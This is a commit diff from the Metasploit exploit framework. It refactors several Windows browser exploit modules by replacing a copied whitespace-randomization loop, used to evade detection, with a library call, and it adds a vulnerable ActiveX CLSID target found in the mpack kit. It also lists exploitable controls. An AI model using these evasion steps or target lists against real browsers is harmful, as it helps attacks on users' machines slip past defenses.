randomize_space
git-svn-id: file:///home/svn/framework3/trunk@5496 4d416f70-5f16-0410-b530-b9f4589650daunstable
James Lee
parent
297e4f4b4d
commit
faa5f7c967
|
|
@ -146,6 +146,7 @@ include Exploit::Remote::HttpServer::HTML
|
|||
# Automatic browser and OS detection
|
||||
#
|
||||
|
||||
print_status("Attempting to exploit ani_loadimage_chunksize")
|
||||
browser = ''
|
||||
|
||||
if target['Method'] == 'automatic'
|
||||
|
|
|
|||
|
|
@ -48,7 +48,9 @@ class Exploits::Windows::Browser::IE_CreateObject < Msf::Exploit::Remote
|
|||
[ 'Automatic', { } ],
|
||||
|
||||
# Patched
|
||||
[ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E36}'} ],
|
||||
[ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E36}'} ],
|
||||
# Found in mpack
|
||||
[ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E30}'} ],
|
||||
|
||||
# Patched
|
||||
[ 'MS06-073 - WMIScriptUtils.WMIObjectBroker2.1', { 'CLSID' => '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'} ],
|
||||
|
|
@ -58,24 +60,24 @@ class Exploits::Windows::Browser::IE_CreateObject < Msf::Exploit::Remote
|
|||
[ 'UNKNOWN - SoftwareDistribution.WebControl.1', { 'CLSID' => '{6414512B-B978-451D-A0D8-FCFDF33E833C}'} ],
|
||||
|
||||
# Visual Studio components, not marked as safe
|
||||
[ 'UNKNOWN - VsmIDE.DTE', { 'CLSID' => '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'} ],
|
||||
[ 'UNKNOWN - DExplore.AppObj.8.0', { 'CLSID' => '{639F725F-1B2D-4831-A9FD-874847682010}'} ],
|
||||
[ 'UNKNOWN - VisualStudio.DTE.8.0', { 'CLSID' => '{BA018599-1DB3-44f9-83B4-461454C84BF8}'} ],
|
||||
[ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', { 'CLSID' => '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'} ],
|
||||
[ 'UNKNOWN - VsaIDE.DTE', { 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ],
|
||||
[ 'UNKNOWN - VsmIDE.DTE', { 'CLSID' => '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'} ],
|
||||
[ 'UNKNOWN - DExplore.AppObj.8.0', { 'CLSID' => '{639F725F-1B2D-4831-A9FD-874847682010}'} ],
|
||||
[ 'UNKNOWN - VisualStudio.DTE.8.0', { 'CLSID' => '{BA018599-1DB3-44f9-83B4-461454C84BF8}'} ],
|
||||
[ 'UNKNOWN - Microsoft.DbgClr.DTE.8.0', { 'CLSID' => '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'} ],
|
||||
[ 'UNKNOWN - VsaIDE.DTE', { 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ],
|
||||
|
||||
#
|
||||
# The controls below can launch the "installing component" dialogs...
|
||||
#
|
||||
|
||||
# Not marked as safe
|
||||
[ 'UNKNOWN - Business Object Factory ', { 'CLSID' => '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'} ],
|
||||
[ 'UNKNOWN - Business Object Factory ', { 'CLSID' => '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'} ],
|
||||
|
||||
# Not marked as safe
|
||||
[ 'UNKNOWN - Outlook Data Object', { 'CLSID' => '{0006F033-0000-0000-C000-000000000046}'} ],
|
||||
[ 'UNKNOWN - Outlook Data Object', { 'CLSID' => '{0006F033-0000-0000-C000-000000000046}'} ],
|
||||
|
||||
# Found exploitable in the wild (no details)
|
||||
[ 'UNKNOWN - Outlook.Application', { 'CLSID' => '{0006F03A-0000-0000-C000-000000000046}'} ],
|
||||
[ 'UNKNOWN - Outlook.Application', { 'CLSID' => '{0006F03A-0000-0000-C000-000000000046}'} ],
|
||||
|
||||
],
|
||||
'DefaultTarget' => 0))
|
||||
|
|
@ -218,19 +220,7 @@ function #{var_func_exploit}( ) {
|
|||
^
|
||||
|
||||
|
||||
# Randomize the whitespace in the document
|
||||
content.gsub!(/\s+/) do |s|
|
||||
len = rand(100)+2
|
||||
set = "\x09\x20\x0d\x0a"
|
||||
buf = ''
|
||||
|
||||
while (buf.length < len)
|
||||
buf << set[rand(set.length)].chr
|
||||
end
|
||||
|
||||
buf
|
||||
end
|
||||
|
||||
content = Rex::Text.randomize_space(content)
|
||||
|
||||
print_status("Sending exploit HTML to #{cli.peerhost}:#{cli.peerport}...")
|
||||
|
||||
|
|
|
|||
|
|
@ -86,19 +86,8 @@ class Exploits::Windows::Browser::IE_IsComponentInstalled < Msf::Exploit::Remote
|
|||
</html >
|
||||
|
|
||||
|
||||
# Randomize the whitespace in the document
|
||||
content.gsub!(/\s+/) do |s|
|
||||
len = rand(100)+2
|
||||
set = "\x09\x20\x0d\x0a"
|
||||
buf = ''
|
||||
|
||||
while (buf.length < len)
|
||||
buf << set[rand(set.length)].chr
|
||||
end
|
||||
|
||||
buf
|
||||
end
|
||||
|
||||
content = Rex::Text.randomize_space(content)
|
||||
|
||||
# Insert the shellcode
|
||||
content.gsub!('__pattern__', pattern)
|
||||
|
||||
|
|
|
|||
|
|
@ -102,18 +102,7 @@ class Exploits::Windows::Browser::Kazaa_Altnet_Heap < Msf::Exploit::Remote
|
|||
"</script>\n" +
|
||||
"</html>"
|
||||
|
||||
# Randomize the whitespace in the document
|
||||
content.gsub!(/\s+/) do |s|
|
||||
len = rand(100)+2
|
||||
set = "\x09\x20\x0d\x0a"
|
||||
buf = ''
|
||||
|
||||
while (buf.length < len)
|
||||
buf << set[rand(set.length)].chr
|
||||
end
|
||||
buf
|
||||
|
||||
end
|
||||
content = Rex::Text.randomize_space(content)
|
||||
|
||||
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
|
||||
|
||||
|
|
|
|||
|
|
@ -154,18 +154,7 @@ class Exploits::Windows::Browser::MS06_013_CreateTextRange < Msf::Exploit::Remot
|
|||
</html >
|
||||
|
|
||||
|
||||
# Randomize the whitespace in the document
|
||||
content.gsub!(/\s+/) do |s|
|
||||
len = rand(100)+2
|
||||
set = "\x09\x20\x0d\x0a"
|
||||
buf = ''
|
||||
|
||||
while (buf.length < len)
|
||||
buf << set[rand(set.length)].chr
|
||||
end
|
||||
|
||||
buf
|
||||
end
|
||||
content = Rex::Text.randomize_space(content)
|
||||
|
||||
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
|
||||
|
||||
|
|
|
|||
|
|
@ -122,19 +122,7 @@ class Exploits::Windows::Browser::MS06_055_VML_Overflow < Msf::Exploit::Remote
|
|||
</html>
|
||||
|
|
||||
|
||||
# Randomize the whitespace in the document
|
||||
content.gsub!(/\s+/) do |s|
|
||||
len = rand(100)+2
|
||||
set = "\x09\x20\x0d\x0a"
|
||||
buf = ''
|
||||
|
||||
while (buf.length < len)
|
||||
buf << set[rand(set.length)].chr
|
||||
end
|
||||
|
||||
buf
|
||||
end
|
||||
|
||||
content = Rex::Text.randomize_space(content)
|
||||
|
||||
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
|
||||
|
||||
|
|
|
|||
|
|
@ -113,19 +113,8 @@ class Exploits::Windows::Browser::MS06_057_WebView_SetSlice < Msf::Exploit::Remo
|
|||
</html>
|
||||
|
|
||||
|
||||
# Randomize the whitespace in the document
|
||||
content.gsub!(/\s+/) do |s|
|
||||
len = rand(100)+2
|
||||
set = "\x09\x20\x0d\x0a"
|
||||
buf = ''
|
||||
|
||||
while (buf.length < len)
|
||||
buf << set[rand(set.length)].chr
|
||||
end
|
||||
|
||||
buf
|
||||
end
|
||||
|
||||
content = Rex::Text.randomize_space(content)
|
||||
|
||||
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
|
||||
|
||||
# Transmit the response to the client
|
||||
|
|
|
|||
|
|
@ -127,18 +127,7 @@ class Exploits::Windows::Browser::MS06_071_XML_CORE < Msf::Exploit::Remote
|
|||
</html>
|
||||
|
|
||||
|
||||
# Randomize the whitespace in the document
|
||||
content.gsub!(/\s+/) do |s|
|
||||
len = rand(100)+2
|
||||
set = "\x09\x20\x0d\x0a"
|
||||
buf = ''
|
||||
|
||||
while (buf.length < len)
|
||||
buf << set[rand(set.length)].chr
|
||||
end
|
||||
|
||||
buf
|
||||
end
|
||||
content = Rex::Text.randomize_space(content)
|
||||
|
||||
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
|
||||
|
||||
|
|
|
|||
|
|
@ -105,18 +105,8 @@ class Exploits::Windows::Browser::NovelliPrint_ExecuteRequest < Msf::Exploit::Re
|
|||
</html>
|
||||
|
|
||||
|
||||
# Randomize the whitespace in the document
|
||||
content.gsub!(/\s+/) do |s|
|
||||
len = rand(100)+2
|
||||
set = "\x09\x20\x0d\x0a"
|
||||
buf = ''
|
||||
content = Rex::Text.randomize_space(content)
|
||||
|
||||
while (buf.length < len)
|
||||
buf << set[rand(set.length)].chr
|
||||
end
|
||||
buf
|
||||
end
|
||||
|
||||
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
|
||||
|
||||
# Transmit the response to the client
|
||||
|
|
|
|||
Loading…
Reference in New Issue